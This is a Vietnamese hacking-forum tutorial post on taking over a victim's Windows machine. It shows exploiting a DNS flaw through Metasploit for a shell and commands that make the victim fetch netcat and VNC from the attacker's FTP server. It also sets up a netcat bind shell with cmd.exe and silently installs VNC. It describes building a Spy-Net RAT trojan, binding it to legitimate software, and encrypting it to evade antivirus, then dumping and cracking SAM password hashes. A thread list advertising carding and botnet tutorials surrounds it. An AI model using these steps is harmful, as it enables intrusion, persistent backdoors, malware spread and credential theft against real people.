• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

[Tut]Basic Hacking - Hacking cơ bản

ShadoH

New Member
phương pháp hacking máy Victim, nội dung của phương pháp gồm:



  1. Khai thác lỗi DNS.
  2. Dùng Netcat để back connect.
  3. Remote install VNC lên máy Victim.
  4. Cách sử dụng Spy-Net để làm chủ đựợc máy Victim.
  5. System Hacking (đọc file SAM crack password ).


Trước khi muốn tấn công vào 1 server hay hệ thống nào đó thì ta phải tiến hành bước Foot Printing và Scanning, nhưng ở đây tôi bỏ qua bước Foot Printing. Scanning giúp ta thu thập thông tin của Victim ( vd: Victim sử dụng OS gì, đang mở những port nào…)
Ở bước Scanning này tôi sử dụng tool có tên là Zenmap (tool này có giao diện GUI) còn Nmap thì dùng bằng command. Giao diện của Zenmap như sau:









Sau khi Scan ta xác định được Server(Victim) có open port 53 (dịch vụ DNS)
Tiếp theo ta dùng Metasploit Framework để scan lỗi DNS.




Sau khi Execute và điền thông tin về OS server, IP … thì ta chiếm dc shell của Victim





Khi chiếm được shell của Victim rồi thì ta có thể add user và thăng quyền …
Để fix lỗi DNS này thì ta vào cách link trong References để xem thông tin về Bug này và download các bản vá lỗi.
Sau khi chiếm được shell của Victim rồi ta dùng command ra lệnh cho victim lên FTP server của ta hay lên web để download file netcat về để dành sau này nếu Victim fix lỗi DNS thì còn back connect lại được. >.<
Từ shell mà chiếm được ở trên ta tạo ra các lệnh mà client sẽ chạy để lên FTP server download netcat về và các command đó ta bỏ vào file tên là netcat.txt:


Echo open 192.168.3.150>netcat.txt <= connect đến FTP Server
Echo administrator>>netcat.txt <= username FTP
Echo 123>>netcat.txt <= password FTP
Echo binary>>netcat.txt <= File type
Echo prompt n>>netcat.txt <= tắt prompt khi download file
Echo mget nc.exe>>netcat.txt <= get file nc.exe về
Echo quit>>netcat.txt <= thoát FTP


Sau khi thi hành các lệnh trên thì ta dùng type netcat.txt để xem lại các command mà ta add trong netcat.txt
Download file nc.exe



ftp –s:netcat.txt


Tiếp theo khi download file nc.exe về máy rồi thì ta cho netcat listen ở port 1234 để lần sau ta back connect lại máy Victim với port 1234.



Nc –nvv –Lp 1234 –e cmd.exe


Với –n: chỉ dùng địa chỉ IP mà không truy vấn DNS

-vv: hiển thị chi tiết các thông tin về kết nối hiện tại.
-L: buộc Netcat "cố" lắng nghe, nẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-p: port, chỉ định cổng port mà netcat listen.
-e: yêu cầu netcat thi hành chương trình, thường dùng trong chế độ lắng nghe.

=> Sau khi ra lệnh cho Victim listening ở port 1234, từ máy Attacker ta connect tới Victim trên port 1234


Nc 192.168.3.200 1234


Ngoài cách sử dụng netcat ta có thể sử dụng BindPort do T4mQu0c code để back connect
Khi client chạy file BindPort thì client sẽ listening port 9999. Khi này ta dùng netcat để back connect lại máy Victim thông qua port 9999. Đặc điểm của con BindPort này là khi Victim phát hiện ra máy mình đang có process BindPort chạy thì Victim không thể End process được.

Tiếp theo là Remote install VNC lên máy Victim:
Từ shell của Victim ta thi hành command sau để tạo ra file vnc.txt để cho Victim download files vnc trên FTP Server:


Echo open 192.168.3.150>vnc.txt
Echo administrator>> vnc.txt
Echo 123>> vnc.txt
Echo binary>> vnc.txt
Echo prompt n>> vnc.txt
Echo cd vnc>>vnc.txt <= vào thư mục vnc
Echo mget *.*>> vnc.txt <= download tất cả các file trong vnc folder
Echo quit>> vnc.txt


Download các file trong vnc folder trên FTP Server:


ftp –s:vnc.txt


Cài đặt VNC:
Các file trong vnc folder mà ta đã download về có file tên vnc.reg
Ta sẽ chạy file này để ghi vào trong regedit.
Lệnh merge file vnc.reg như sau:


Regedit /s C:\vnc.reg


Sau khi chạy file vnc.reg rồi thì ta install winvnc.exe


Winvnc -install


Và cuối cùng là start services winvnc lên để có thể dùng VNC connect tới Victim


Net start winvnc


Cách sử dụng Spy-Net để làm chủ đựợc máy Victim
Soft sử dụng Spy-net [RAT] v1.8.
Chạy file spinet.exe để build ra file Trojan. File này có tác dụng khi client chạy nó thì client sẽ connect về server mà ta đã chỉ định trong quá trình build file.






Ta hoàn toàn làm chủ được máy Victim


Ví dụ: open 1 trang web do ta chỉ định, download/upload file lên máy victim

Để đánh lừa Victim thì ta có thể ghép file Trojan mình vừa build ra với 1 software bất kì
Ví dụ: ta ghép file trojan.exe với file IDM.exe chẳng hạn
Khi client chạy file IDM là trojan.exe nó chạy lun :p
Ví dụ file trojan của ta bị software antivirus phát hiện thì ta có thể dùng tool mã hóa con trojan đó để bypass software anti-virus.

System Hacking (đọc file SAM crack password ).
Dãy thuật thường dùng là : LM Hash ( WinNT, 98) , NTLM & NTLM v2 (Win2003 trở lên)

Cách dùng đĩa Hiren Boot để ghi đè file SAM không phải là cracking tại vì mình không biết được password hiện tại.

LM Hash tối đa 14 kí tự và được chia làm 2 phần : 7 + 7

NTLM & NTLM v2 (băm chung)

Hiện nay WinXP và Win2003 đều dùng chung 2 dãy thuật là LM Hash và NTLM & NTLM v2.

Có rất nhiều soft hỗ trợ crack password nhưa LC5 và Cain. Ở đây tôi dùng pwdump7 để đọc file SAM và dùng đĩa OPHCrack để tự động dò password (password phải nhỏ hơn 14 kí tự).

Nguồn WhiteHat ( đây là bài viết của mình )
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Q Cần mua tut reg domain bằng CCN Hỏi đáp về domain & hosting 2
Admin Share tut bắn reach ads Facebook mới nhất dùng thẻ cứng Tut, tool, mmo 2
Admin Share tut ân hạn Facebook mới nhất 2020 Tut, tool, mmo 2
Admin Tut kháng Ad Breaks bị tắt kiếm tiền thành công Tut, tool, mmo 0
Admin Share một số tut chiến Facebook Ad Breaks theo kinh nghiệm Tut, tool, mmo 0
Smobi Share [Tut] Làm một vật trở nên trong suốt bằng PTS Thiết kế đồ họa 0
KhangSkull [TUT] Khai thác SQLi dạng .html SQL injection 0
Admin Tut reseller domain không die Tut, tool, mmo 1
Admin Share video tut reg domain quốc tế free bằng ccv thực vật Tut, tool, mmo 0
Hero Share TUT Local Full 2012 Tut, tool, mmo 6
Admin [Tut] hack bạn gái cho it Thơ, báo, tạp chí 2
H Tut Hack Card Viettel Số Lượng Ko Giới Hạn Trò chuyện linh tinh 14
Admin Share Tut Spam Facebook Tut, tool, mmo 0
blog4me Share Tổng hợp một số TUT chơi CC Security - Local - Hacking 2
S TUT Vps Free 1 Tháng VPS & Dedicated Server 1
Myshare Share Tut hướng dẫn add site(tên miền) lên google Hosting / Domain 0
Admin Share tut reg domain .vn 2013 - nhanh không nát Tut, tool, mmo 3
Hero [TUT] Reg Domain, VPS, Hosting Đủ Loại Security - Local - Hacking 11
Admin Share tut đâm domain .my free 1-5 year Tut, tool, mmo 2
Admin Share Tut Hosting Pháp Disk 512mb Bw Unlimited Tut, tool, mmo 0
Admin Share tut reg domain bằng ccv, ccn 1-10 years Tut, tool, mmo 2
Admin Share tut ship giầy nhầm nước Tut, tool, mmo 5
V Hướng dẫn [TUT] Gửi email từ localhost bằng Mercury Mail VPS & Dedicated Server 0
V Share [Cash Out] Tut site cash PP&CC về PPVN đang được thịnh hành Hacking 0
V Share [Tut] Fake Ip từ A đến Z Hacking 0
V Share [Tut] Hack site lỗi SQLi với Havij + Up shell - Guan™ Hacking 0
V Share [TUT] sữ dụng Botnet ZEUS chi tiết Hacking 0
K Xin anh em co tut an gift Hacking 0
S [tut] domain .*** free = ccn Hosting & Domain Free 0
J Share [Tut] Fake Ip từ A đến Z Security - Local - Hacking 0
S Share [Shipping Tut] Key KIS 2012, KIS 2013, NIS 2012, MS.... Hacking 1
Admin [Tut] domain yahoo 5 năm Tut, tool, mmo 15
X Share [TUT] Đăng kí domain .me 1 năm miễn phí Hosting & Domain Free 14
Admin Share tut ship nước hoa bằng ccv Tut, tool, mmo 7
Admin [Tut] sql dạng html Tut, tool, mmo 2
V [TUT] VPS Win/Linux UK VPS & Dedicated Server 6
Admin [Tut] Case iPhone+clo Tut, tool, mmo 2
Admin [Tut] reg domain .me miễn phí 100% Tut, tool, mmo 3
V [TUT] quần áo chơi chơi lẤy ccv Tut, tool, mmo 30
V [Tut] Áo phông Nam nữ direct free tax 2 Tut, tool, mmo 2
Admin [Tut] sql bypass 406 cực cơ bản cho newbie Tut, tool, mmo 0
Admin 200 tut của hce Tut, tool, mmo 3
Admin [Tut] cách chọn size để ship đồ Tut, tool, mmo 0
Admin [Tut] bypass admin cpanel Tut, tool, mmo 0
Admin [Video tut] “hack facebook” tut tiếc cho bằng anh bằng em Hacking 0
S tut tạo yahoo bằng số mr.reeon Sử dụng, chia sẻ, hỏi đáp 1
Admin Tut up shell drupal Local attack 0
S TUT reg nick yahoo nhanh chóng Phần mềm 0
Admin [Tut] verify phone call chưa bao giờ đơn giản đến thế Tut, tool, mmo 0
KhanhIT TUT UG (video) tổng hợp dành cho newbie Local attack 0

Similar threads

New posts New threads New resources

Back
Top